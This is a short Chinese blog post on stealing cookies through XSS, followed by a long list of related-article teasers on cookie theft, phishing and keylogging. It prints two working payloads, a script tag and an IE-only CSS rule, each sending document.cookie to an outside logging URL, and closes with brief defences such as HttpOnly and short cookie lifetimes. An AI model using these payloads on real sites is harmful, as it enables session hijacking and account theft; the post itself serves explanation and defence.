xss攻击之窃取用户cookie

最新推荐文章于 2025-06-13 23:35:49 发布

原创最新推荐文章于 2025-06-13 23:35:49 发布 · 825 阅读

0 ·

CC 4.0 BY-SA版权

web安全专栏收录该内容

3 篇文章

订阅专栏

本文介绍了一种通过XSS攻击窃取网站Cookie的方法，并展示了使用JavaScript和CSS实现这一过程的简单示例。同时，文章也提出了防范措施，如定期重置Session、缩短Cookie有效期、监控referrer与userAgent等。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

引用链接：https://blog.fundebug.com/2017/08/16/xss_steal_cookie/

下面的的JavaScript代码就可以窃取Cookie，是不是很简单？

<script>
new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);
</script>

在IE浏览器上，可以通过在CSS代码中执行JavaScript来窃取Cookie，也很简单。

<style>
.getcookies{
    background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);');
}
</style>
<p class="getcookies"></p>

为了保证安全：请不停地重设session的重设；将过期时间设置短一些；监控referrer与userAgent的值；使用HttpOnly禁止脚本读取Cookie。这些措施并非万无一失，但是增加了黑客的难度，因此也是有效的。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

benzun_yinzi

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

【网络安全】XSS之Cookie外带攻击姿势及例题详析

等风来

05-19

9240

XSS 的 Cookie 外带攻击就是一种针对 Web 应用程序中的 XSS（跨站脚本攻击）漏洞进行的攻击，攻击者通过在 XSS 攻击中注入恶意脚本，从而窃取用户的 Cookie 信息。攻击者通常会利用已经存在的 XSS 漏洞，在受害者的浏览器上注入恶意代码，并将受害者的 Cookie 数据上传到攻击者控制的服务器上，然后攻击者就可以使用该 Cookie 来冒充受害者，执行一些恶意操作，例如盗取用户的账户信息、发起钓鱼攻击等。

[网络安全]XSS之Cookie外带攻击姿势详析

Hacker_LaoYi的博客

02-13

1020

给小伙伴们的意见是想清楚，自学网络安全没有捷径，相比而言系统的网络安全是最节省成本的方式，因为能够帮你节省大量的时间和精力成本。坚持住，既然已经走到这条路上，虽然前途看似困难重重，只要咬牙坚持，最终会收到你想要的效果。黑客工具&SRC技术文档&PDF书籍&web安全等（可分享）网络安全产业就像一个江湖，各色人等聚集。

参与评论您还未登录，请先登录后发表或查看评论

利用XSS窃取用户Cookie

Monsterlz123的博客

07-20

7713

【XSS】利用XSS窃取用户Cookie Hello，各位小伙伴周六愉快。晃眼之间一周又快要过去了，时间是不等人滴~~ 这周准备连发三篇XSS相关内容，两篇实战，一篇总结。然后XSS漏洞部分就暂时完结啦~~ 今天我们来看看怎么利用XSS窃取用户cookie吧。一、实验概述实验拓扑： XSS的用途之一就是窃取用户的cookie，攻击者利用XSS在网站中插入恶意脚本，一旦用户访问该网页...

XSS-窃取Cookie及拓展

2301_76631050的博客

07-23

2017

步骤一：来到xss平台点击公共模块---flash弹窗钓⻥-查看将其中的代码保存成⼀个js⽂件放到我们⽹站的根⽬录下⾯。步骤二：用记事本打开1.js 修改js中的这⼀⾏代码，改成我们伪造的flash⽹站⽹址。步骤七：点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...步骤⼋：配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件！步骤二：在我的项目中选择我们刚创建的项目，点击右上角的查看配置代码。把文件复制到我们网站的根目录下。

渗透实战：利用XSS获取cookie和密码

最新发布

ericalezl的博客

06-13

777

之后点击轮询可以看到目标向的域名发送的请求，找到一个请求中带有 secret 和 session 字样的就是 cookie 信息。将复制的域名放到 fetch 中，body 为 document.cookie，就是访问这个留言板的用户的 cookie。访问 my-account 转包，将 cookie 替换重放即可登录管理员账户。留言板位置找到注入 xss 的位置后，构造获取对方密码的请求。输入的任何单引号双引号尖括号都会被 unicode 编码。直接换另一种代码执行方式。里面可以执行 js 代码。

XSS(偷你的Cookies)

qq_27552077的博客

03-12

1万+

XSS(Cross Site Scripting),跨站脚本攻击,取名XSS是避免和CSS同名。XSS攻击原理：攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码，当其它用户浏览该网站时，这段HTML代码会自动执行，从而达到攻击的目的。同时这也因为HTTP采用的明文模式，这样就让黑客有机可乘了(在我另一篇文章介绍过利用fiddle可以捕获HTTP报文)。我发现网上很多关于XSS攻击的文章都没

【XSS漏洞】XSS攻击平台-窃取Cookie

muyuchen110的博客

07-23

905

XSS漏洞基础：XSS 攻击全称跨站脚本攻击，是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆，故将跨站脚本攻击缩写为 XSS，XSS 是⼀种在 web 应⽤中的计算机安全漏洞，它允许恶意web⽤户将代码植⼊到 web ⽹站⾥⾯，供给其它⽤户访问，当⽤户访问到有恶意代码的⽹⻚就会产⽣ xss 攻击；漏洞概念：⽬标未对⽤户从前端功能点输⼊的数据与输出的内容未进⾏处理或者处理不当，从⽽导致恶意的JS代码被执⾏造成窃取⽤户信息劫持WEB⾏为危害的。

XSS的高级利用：盗取用户Cookie

Zeker62的博客

08-13

1313

XSS不仅仅弹出一个alert就行了，更多的是和其他玩意组合高级的利用有：盗取用户Cookie 修改网页内容网站挂马利用网站重定向 XSS蠕虫 XSS会话劫持 XSS会话劫持和Cookie有关 Cookie简介： Cookie是一种能够让网站服务器把少量文本数据存储到客户端的硬盘或者内存中，或者是从客户端的硬盘或者内存读取数据的一种技术因为HTTP协议是无状态的，Web服务器没办法区分请求是否来源于同一个浏览器，因此，web服务器需要额外的数据去维持会话，而Cookie正是这种维持会话的数

xss之cookie窃取

weixin_30911809的博客

03-07

629

一、窃取cookie有什么用？ cookie相当于一个身份证有了管理员的cookie我们不需要帐号密码就可以登陆二、反射型xss有存贮型xss什么区别？反射 xss和服务器没有交互只能用一次储存 xss和服务器有交互可以反复使用危害较大三、本次教程用到的工具 1.phpstudy（PHP调试环境的程序集成包） 2.dv...

使用xss钓鱼盗取用户cookie

m0_74805513的博客

07-27

1369

那么可以看到第一步写入成功了，将cookie写入了我们事先建立好的网站，并且保存了下来，我们在点开gtck.html 去更加细致的查看里面是否有我们保存的cookie。这行代码也很简单，就是加载后转到我们搭建的web网页，向我们的网页传入用户的cookie，document.location='url'起到页面加载后转到。很简单的一个网页主要用来接收用户cookie，然后写入gtck.html文件里，然后我们在创建gtck.html文件，用来保存用户cookie。

【安全】P 4-2 XSS盗取cookie

Z_David_Z的博客

02-17

569

目录0X01 cookie介绍0X02 反射XSS盗取cookie0X03 利用cookie会话劫持0X04 劫持会话后的操作 0X01 cookie介绍 Cookie 是在 HTTP 协议下，服务器或脚本可以维护客户工作站上信息的一种方式。Cookie 是由 Web 服务器保存在用户浏览器（客户端）上的小文本文件，它可以包含有关用户的信息。目前有些 Cookie 是临时的，有些则是持续的。临时的 Cookie 只在浏览器上保存一段规定的时间，一旦超过规定的时间，该 Cookie 就会被系统清除服务器可

XSS获取cookie和利用方式 (ASP版).txt

12-22

XSS获取cookie和利用方式简单方法

网络安全学习笔记——盗取Cookies跨站脚本（XSS）

just do it

07-24

2623

使用替换过了的URL发给目标，诱导目标点击，然后目标的cookies就会回弹到XSS攻击平台上，展开就可以看到该目标的PHPSESSID，然后在自己的同源网站上，笔记本按Fn+F12，调出Hackerbar，点击存储，然后把PHPSESSID换成攻击之后得到的，删掉浏览框里面多余的东西，剩下XXX.php即可，刷新之后就会登录该目标的账号——，SESSID——中间键，是Apache分配的，唯一的“身份证”，从SESSID入手，就可以查取用户的相关信息。

最简单的反射型XSS拿cookie

热门推荐

thislocal的博客

03-29

1万+

参考了网上的一堆教程和余弦的《web前端黑客技术揭秘》主要是关于XSS的。更准确一点，关于盗取cookie的，且是反射型。其实就是最简单的一个反射型cookie盗取过程。一、XSS的一般过程： 1、找到XSS漏洞，假设存在于网站A； 2、发送可以触发该漏洞的，特定代码到攻击目标；可以这样构造：凤姐最新性感视频其中，www.foo.com/xss/xss.php?x=是存在漏洞的

TOP16-XSS -- 小黑超细详解-+案例说明（盗取cookie登录）＜宝藏文＞

G_WEB_Xie的博客

04-03

1506

概念：通常指通过HTML注入篡改了网页，插入恶意脚本，从而在用户浏览网页时，控制用户浏览器的一种攻击。当入侵网站后，通过自己编定的脚本或者木马嵌入到网站页面，利用网站的流量将自己的网页木马传播出去从而达到自己的目的，当用户浏览网站的时候点击了编订的恶意程序脚本，从而达到获取用户信息，进行一系列未授权的操作。通俗理解：此漏洞主要以盗取用户信息，获取用户的权限做一些越权操作，还可以结合其它漏洞进行一系列的攻击行为。

【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取，钓鱼以及键盘监听吗？--- XSS实战篇

m0_67844671的博客

10-05

5666

你知道xss漏洞如何利用吗？本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取，钓鱼获取用户名密码以及监听键盘记录等，让你对xss漏洞有进一步认识。

XSS获取目标cookie，伪造身份获取目标权限

qq_57663276的博客

08-23

3384

未知攻，何来防。网络安全靶场学习：XSS（跨站脚本攻击）,使用XSS伪造目标权限。

XSS的键盘记录和cookie获取

Williamanddog的博客

01-26

2766

跨站脚本攻击XSS(Cross Site Scripting)，为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆，故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码，当用户浏览该页面时，嵌入Web里面的JS代码会被执行，从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的攻击。在一个Web页面上，有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容。

利用XSS盗取cookies

weixin_34235371的博客

02-25

169

利用XSS盗取cookies 1.把下里代码保存为cookies.asp,然后上传到能被正常访问的空间 <% testfile=Server.MapPath("cookies.txt") msg=Request("cookies") set fs=server.Cre...

XSS攻击实验室：窃取cookies与操纵用户好友

这演示了存储型XSS攻击，攻击者可以长期窃取受害者的cookie，实现持久性的会话劫持。 **Task4: Becoming the Victim’s Friend** 最后的任务涉及到更复杂的攻击，攻击者构造了一个恶意脚本，当页面加载时自动发送一...